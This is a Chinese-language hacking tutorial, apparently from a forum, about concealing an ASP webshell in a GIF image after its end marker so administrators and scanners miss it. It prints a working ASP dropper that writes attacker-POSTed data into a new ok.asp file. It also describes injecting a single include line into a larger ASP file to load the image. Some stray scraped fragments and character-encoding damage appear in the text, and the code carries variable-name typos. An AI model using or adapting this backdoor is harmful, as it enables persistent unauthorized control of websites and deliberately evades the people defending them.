本文作者： 臭要飯的！[BST]

    如果要 作者信息和來(lái)源

    Http://www.bugkidz.org

    ----------------------------------------

    現(xiàn)在從注入拿WEBSHELL看來(lái)成功率都比較高了，

腳本后門(mén)的深入圖片中的后門(mén)

    拿到SHELL后，安裝自己的腳本后門(mén)，常常被查殺。

    腳本后門(mén)的發(fā)展史：

    1。最開(kāi)始就是直接放一個(gè)ASP文件上去。

    2。把ASP文件加密才放上去。

    3。把腳本插入到代碼中去。（我經(jīng)常用這種）

    不過(guò)一樣被查得出來(lái)，我前段時(shí)候手工檢測(cè)一個(gè)站的腳本安全。

    發(fā)現(xiàn)這個(gè)站被種了21個(gè)木馬。

    所以我就想到了，怎么樣才能不被發(fā)現(xiàn)不能被查殺。

    最后我研究了一下如果把腳本插入到圖片中。

    然后在ASP中調(diào)用圖片中的腳本程序應(yīng)該就可以了。

    測(cè)試的時(shí)候通過(guò)了。

    現(xiàn)在我把我的心德寫(xiě)一下。

    讓大家來(lái)分析一下。共同進(jìn)步和完善這種方法。

    在研究過(guò)程中我看了GIF圖片的結(jié)構(gòu)文檔方面的書(shū)。

    GIF圖片都是以 00 3B 為結(jié)束的。

    換句話說(shuō)00 3B 后面的不會(huì)顯示出來(lái)。

    所以我們?cè)?0 3B后面插入代碼就行了。

    當(dāng)然代碼我們加密放到圖片中去效果更好。

    我寫(xiě)了一個(gè)程序來(lái)這么做。

    這里要說(shuō)一下，在圖片中00 3B后面的是不會(huì)顯示出來(lái)的。

    但其中的代碼已經(jīng)運(yùn)行了。圖片也會(huì)正常顯示出來(lái)。

    測(cè)試：

    在圖片后面加入：<%=now%>

    然后在一個(gè)ASP文件中加入:

    然后你們下載這個(gè)圖片，發(fā)現(xiàn)圖片最后面變成了時(shí)間。很正常因?yàn)閳D片放到了ASP腳本中運(yùn)行了其中的代碼。

    換句話來(lái)說(shuō)，如果寫(xiě)的是一段生成文件的腳本。

    那么我們提交特定的參數(shù)讓圖片中的代碼去生成文件。

    這樣就實(shí)現(xiàn)了我們的后門(mén)。

    1：這種方法要做的工作就是在目標(biāo)站點(diǎn)中找一張GIF圖片然后把代碼插入到圖片中，再上傳到站點(diǎn)中去。這樣作管理員很難找到木馬在哪里，

電腦資料

    2：我們插入的代碼只有一行就是那個(gè)include file .....

    找個(gè)文件大點(diǎn)的ASP文件給插進(jìn)去就行了。

    然后我們?cè)诒镜豍OST數(shù)據(jù)提交給ASP引用圖片的URL這樣就完成了工作。

    我的插入圖片的腳本：

    <% dim objFSO %>

    <% dim fdata %>

    <% dim objCountFile %>

    <% on error resume next %>

    <% Set bjFSO = Server.CreateObject("Scripting.FileSystemObject") %>

    <% fdata = request("cyfddata") %>

    <% if fdata<>"" then %>

    <% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>

    <% Set bjCountFile=objFSO.CreateTextFile(syfdapth,True) %>

    <% objCountFile.Write fdata %>

    <% end if %>

    <% objCountFile.Close %>

    <% Set bjCountFile=Nothing %>

    <% Set bjFSO = Nothing %>

    這段代碼主要就是在當(dāng)前目錄下生成一個(gè)ok.asp文件。

    文件內(nèi)容是由我們提交的數(shù)據(jù).用request("cyfddata")來(lái)獲取的。

    這段代碼加密后插入到圖片中去。

    下面我把我程序的代碼貼出來(lái)。（倒程序代碼沒(méi)有打包在里面。明天再貼上來(lái)）

    現(xiàn)在給程序地址下載：

    點(diǎn)這里下載測(cè)試程序。

    本地自己構(gòu)建一個(gè)提交表單向ASP文件提交(加入圖片那個(gè)文件)

    表單文本框輸入內(nèi)容名稱(chēng)是:cyfddata

    后感：

    我本人認(rèn)為這種方法，管理員很難查到。這是我兩天前想到的作出來(lái)了，

    可能有些問(wèn)題希望和大家一起討論，必競(jìng)，為了追求技術(shù)就得研究技術(shù)。

    共享知識(shí)，從而升華。

    感覺(jué)去研究一些新東西，人活得更XS些。